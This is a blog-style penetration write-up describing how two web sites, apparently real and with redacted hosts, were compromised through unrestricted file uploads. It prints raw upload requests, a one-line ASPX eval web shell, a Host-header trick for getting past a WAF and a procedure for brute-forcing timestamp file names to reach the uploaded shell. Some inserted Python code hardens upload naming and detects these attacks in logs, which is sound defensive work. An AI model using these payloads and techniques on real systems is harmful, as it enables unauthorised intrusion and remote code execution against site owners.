One file upload, two sites!

Contents

Site 1: file upload

Site 2: file upload

Site 1: file upload

Source code leak found

Running a directory wordlist scan against the site turned up an exposed bin.zip, so I downloaded it and audited the code.
Handler location: SimpleDataPlatform.SimpleDataPlatform.fileUpload

ProcessRequest receives the request. After reading a bunch of parameters (initialization), it calls the HandleFiles method.

Following HandleFiles: if dateType=ZBJHSB the request is processed further. dateType is passed as a GET parameter.

The save path is /Uploads/SetData/ZBJHSB, str (the file name) is a timestamp, and str2 (the suffix) is not restricted.

So this is an unrestricted upload of any file type. If the handler returned the saved path, the site would be done. Unfortunately, it returns nothing.
Since the method is called fileUpload, the handler file name is probably one of:

fileUpload.aspx
fileUpload.ashx
fileUpload.asmx
fileUploads.aspx
fileUploads.asmx
fileUploads.ashx
Upload.....etc.

Brute-forcing with an existing dictionary found a handler name that returned 200: http://xxx.com:6039/FileUploads.ashx

Construct the upload form directly. The name field of the form part does not need any particular value (nothing in the code checks it). After sending, it returns 200. Did the upload really succeed?

POST /FileUploads.ashx?DataType=ZBJHSB HTTP/1.1
Host: xxx.cn:6039
Content-Length: 195
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySVkAJfiOUeRxhsu8
Accept: */*
Connection: close

------WebKitFormBoundarySVkAJfiOUeRxhsu8
Content-Disposition: form-data; name="File"; filename="1.aspx"
Content-Type: image/jpeg

11111111111
------WebKitFormBoundarySVkAJfiOUeRxhsu8--

Earlier we saw that the file name is the timestamp formatted as yyyyMMddHHmmssfff, with the suffix taken directly from the uploaded name as ext, and we know the exact save path, so brute-forcing the timestamp file name is all that stands between us and the shell. I had not tried this before, so why not.
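As an added illustration in Python (not code from the audited .NET application), here is the naming logic as the post describes it beside a hardened version: the vulnerable function keeps the client's suffix and a yyyyMMddHHmmssfff name under the known path, the hardened one enforces an extension allowlist and a random name. The path comes from the audit above; the allowlist is an assumption for the demo.

```python
import re
import secrets
from datetime import datetime

UPLOAD_DIR = "/Uploads/SetData/ZBJHSB"        # save path from the audit above
ALLOWED_EXT = {"jpg", "jpeg", "png", "pdf"}   # assumed allowlist for this demo


def vulnerable_stored_name(client_filename, now):
    """Naming as the post describes it: timestamp name, client-chosen suffix.
    The suffix is never checked, so 1.aspx is stored as an executable page."""
    ext = client_filename.rsplit(".", 1)[-1] if "." in client_filename else ""
    stamp = now.strftime("%Y%m%d%H%M%S") + f"{now.microsecond // 1000:03d}"  # yyyyMMddHHmmssfff
    return f"{UPLOAD_DIR}/{stamp}.{ext}"


def hardened_stored_name(client_filename):
    """Allowlisted final extension plus a random, unguessable name.
    Any directory components the client sends are discarded."""
    base = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    m = re.fullmatch(r"[^.]+(?:\.[^.]+)*\.([A-Za-z0-9]{1,5})", base)
    if not m or m.group(1).lower() not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    return f"{UPLOAD_DIR}/{secrets.token_urlsafe(24)}.{m.group(1).lower()}"


def looks_guessable(stored_name):
    """True when the basename is a bare digit string (a timestamp) that can be enumerated."""
    stem = stored_name.rsplit("/", 1)[-1].rsplit(".", 1)[0]
    return stem.isdigit()


def demo():
    """Fixed, constructed upload time so the vulnerable name is reproducible."""
    t = datetime(2021, 9, 17, 10, 11, 12, 345000)
    return vulnerable_stored_name("1.aspx", t), hardened_stored_name("photo.JPG")


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print(vulnerable)   # /Uploads/SetData/ZBJHSB/20210917101112345.aspx (guessable, .aspx kept)
    print(hardened)     # random 32-character name ending in .jpg
```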

Brute-forcing the timestamp

Use PowerShell to generate the current timestamp, then press Go in Burp to send the request:
powershell -c Get-Date -Format yyyyMMddHHmmssfff

Then brute-force the last 5 digits, i.e. ssfff (because the local clock may be off, sometimes even 6 digits are needed).
I don't know how long I waited.

Got lucky. What comes after needs no explanation.

Site 2: file upload

Finding the upload interface

Opening http://xxxx:880/zwwpt/#/ showed a webpack bundle with debug mode still enabled. Reading the JS exposed the upload interface.

http://xxxxxx:880/zwwpt/data/menuData.json
A hidden HTML page was found there that is not reachable from any front-end menu node.

http://xxxxxx:880/jtwxt/xgjt/security_risk.html
Click the attachment upload button and capture the request.

There is a WAF; when it blocks a request it returns 404. The request looks roughly like this (some irrelevant parameters omitted):

POST /jtwpt/Ashxs/BaseInfoTransfer.ashx HTTP/1.1
Host: xxxxx.cn:880
Cookie: Hm_lvt_a8b89d1c622d63c547c83ec412cc50ef=1631849663; Hm_lvt_69968305fa176c802589452987ebddc8=1631858810
Connection: close

------WebKitFormBoundary7PCqG5iQ5vwLZ6AB
Content-Disposition: form-data; name="uploadfile[]"; filename="1.aspx"
Content-Type: image/jpeg

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

------WebKitFormBoundary7PCqG5iQ5vwLZ6AB--

Bypass

Modify the Host header:
change xxxx.cn:880 to xxxx.cn or xxx.cn:8888 (any port other than 880 should work)

POST /jtwpt/Ashxs/BaseInfoTransfer.ashx HTTP/1.1
Host: xxxxx.cn
Cookie: Hm_lvt_a8b89d1c622d63c547c83ec412cc50ef=1631849663; Hm_lvt_69968305fa176c802589452987ebddc8=1631858810
Connection: close

------WebKitFormBoundary7PCqG5iQ5vwLZ6AB
Content-Disposition: form-data; name="uploadfile[]"; filename="1.aspx
Content-Type: image/jpeg

1111
------WebKitFormBoundary7PCqG5iQ5vwLZ6AB--

The WAF is bypassed and the upload succeeds, but no path is returned.
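An added detection example (not from the post) for the two behaviours this site shows: an upload request whose Host header differs from the vhost the WAF rules inspect, and a burst of probes for timestamp-shaped file names under an upload directory, which is what finding the path later in the post looks like in the logs. The log lines, host names and expected vhost are constructed.

```python
import re
from collections import Counter, defaultdict

# Constructed sample log lines (not from the post): date time method uri status host
SAMPLE_LOG = """\
2021-09-17 10:11:12 POST /jtwpt/Ashxs/BaseInfoTransfer.ashx 404 xxxxx.cn:880
2021-09-17 10:11:40 POST /jtwpt/Ashxs/BaseInfoTransfer.ashx 200 xxxxx.cn
2021-09-17 10:12:01 GET /uploads/securityrisk/20210917101140001.txt 404 xxxxx.cn:880
2021-09-17 10:12:01 GET /uploads/securityrisk/20210917101140002.txt 404 xxxxx.cn:880
2021-09-17 10:12:02 GET /uploads/securityrisk/20210917101140003.txt 404 xxxxx.cn:880
2021-09-17 10:12:02 GET /uploads/securityrisk/20210917101140004.txt 404 xxxxx.cn:880
2021-09-17 10:12:03 GET /uploads/securityrisk/20210917101140005.txt 200 xxxxx.cn:880
2021-09-17 10:12:09 GET /uploads/securityrisk/logo.png 200 xxxxx.cn:880
"""
EXPECTED_HOST = "xxxxx.cn:880"  # the vhost the WAF rules were written for (assumed)
LINE = re.compile(r"(\S+ \S+) (\w+) (\S+) (\d{3}) (\S+)")


def parse(log):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in log.splitlines():
        m = LINE.fullmatch(line.strip())
        if m:
            yield {"ts": m[1], "method": m[2], "uri": m[3],
                   "status": int(m[4]), "host": m[5]}


def host_mismatch_uploads(records):
    """POSTs to .ashx handlers whose Host header is not the inspected vhost.
    The bypass above changed Host from xxxxx.cn:880 to xxxxx.cn, so the
    application served a request the WAF rules never matched."""
    return [r for r in records
            if r["method"] == "POST" and r["uri"].endswith(".ashx")
            and r["host"] != EXPECTED_HOST]


def timestamp_enumeration(records, threshold=4):
    """Directories receiving `threshold` or more requests for purely numeric,
    timestamp-shaped file names, with a status breakdown per directory."""
    per_dir = defaultdict(Counter)
    for r in records:
        directory, _, name = r["uri"].rpartition("/")
        if re.fullmatch(r"\d{10,17}(\.\w+)?", name):
            per_dir[directory][r["status"]] += 1
    return {d: dict(c) for d, c in per_dir.items() if sum(c.values()) >= threshold}


if __name__ == "__main__":
    recs = list(parse(SAMPLE_LOG))
    print(host_mismatch_uploads(recs))   # the one upload that slipped past the WAF
    print(timestamp_enumeration(recs))   # {'/uploads/securityrisk': {404: 4, 200: 1}}
```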

Finding the path

However, the /uploads/ and /image/ directories were found earlier.

Since the HTML page is named security_risk.html, I constructed candidate paths such as securityrisk, security_risk and security, and ran a directory scan.
Finally this directory was found to exist: http://xxx.cn:880/uploads/securityrisk/

Presumably uploaded files land in this directory (otherwise there would be no reason for such a name, and it sits under uploads), so I tried accessing the file name 1.txt directly, which returned 404:
http://xxx.cn:880/uploads/securityrisk/1.txt

Brute-forcing the timestamp

In my humble experience, .NET sites like to name files with timestamps, so I constructed the current timestamp and tried brute-forcing values near the upload time.
A timestamp is generally 10 or 13 digits.

The naming rules applied to file names after upload are generally one of:
1. Random string
Names in a format like xxx-xxx-xxx--xxx.jpg cannot be guessed. Without directory traversal or a returned path, we can basically give up.

2. Timestamp type

The timestamp plus .jpg is the file name (e.g. 16318676.jpg), or the timestamp carries a counter suffix:
timestamp+00001
timestamp+0001
timestamp+001
timestamp+01
timestamp

3. yyyyMMddHHmm type
This type is generally of the form 20210917xxxxx, where xxxxx should be a millisecond-level number. We can brute-force it directly with Burp; 4 to 6 digits are still feasible, more is not.
powershell -c Get-Date -Format yyyyMMddHHmm

yyyyMMddHHmmssfff
yyyyMMddHHmmssfff+00001
yyyyMMddHHmmssfff+0001
yyyyMMddHHmmssfff+001
yyyyMMddHHmmssfff+01
yyyyMMddHHmmssfff

yyyyMMddHHmmss
yyyyMMddHHmmss+00001
yyyyMMddHHmmss+0001
yyyyMMddHHmmss+001
yyyyMMddHHmmss+01
yyyyMMddHHmmss

With the ideas sorted out, start brute-forcing. Just note the current time when Burp sends the request, obtain the timestamp, and run it through Burp Intruder. Working through the patterns one by one takes about 15 rounds; each time I brute-force the last 5 digits (every type should be fine as long as the connection does not drop and no requests are missed).

After a large amount of brute-forcing, the uploaded text file was found; its name had the format
yyyyMMddHHmmss+0001
Once the path is found, the rest needs no explanation.

However, this method still depends on luck, because the clock on my machine may differ from the target server's by hours or even days.
If the format is yyyyMMddHHmmssfff, there is basically nothing to be done; chalk it up to bad luck.
If it is yyyyMMddHHmmss, brute-forcing 6 digits is feasible.

At this point both sites have been compromised.

Tags: PHP Python security penetration test Web Security

Posted on Mon, 25 Oct 2021 22:50:08 -0400 by tnan